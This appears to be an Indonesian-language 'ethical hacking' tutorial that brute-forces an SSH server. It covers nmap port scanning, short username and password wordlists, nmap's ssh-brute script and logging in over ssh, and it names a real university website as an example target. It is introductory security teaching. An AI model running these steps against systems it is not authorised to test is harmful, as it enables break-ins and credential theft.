Ethhical Hacking : Menyerang Port SSH Server dengan Teknik Brute-force | SSH Part 1

 

Brute-force attack adalah teknik serangan terhadap sebuah sistem keamanan komputer yang menggunakan percobaan terhadap semua kunci. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan komputer. (Wikipedia)

Langkah kerja

1. Tentukan target server yang ingin kita serang

2. Kita harus tahu IP Server yang akan kita serang, contoh kita dapat mengeceknya dengan cara tes ping link website (itda.ac.id)

3. Jika sudah mendapatkan IP Server selanjutnya pengecekkan port ssh dengan cara scanning

$ nmap 192.168.111.2

atau

$ nmap 192.168.111.2 -p 22 --open

4. Membuat list kunci kemungkinan username dan password yang digunakan dengan format .txt

$ sudo nano user.txt

root

admin

user

webserver

server

web

$ sudo nano password.txt

root

admin

admin123

12345

password

password123

5. IP Server sudah didapatkan, kunci username dan password sudah disiapkan. Waktunya pengujian

$ nmap 192.168.111.2 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=password.txt

6. Username dan password telah didapatkan, selanjutnya remote menggunakan perintah ssh

$ ssh webserver@192.168.111.2

cek user dan ip address

$ whoami

$ ip a

SELESAI :)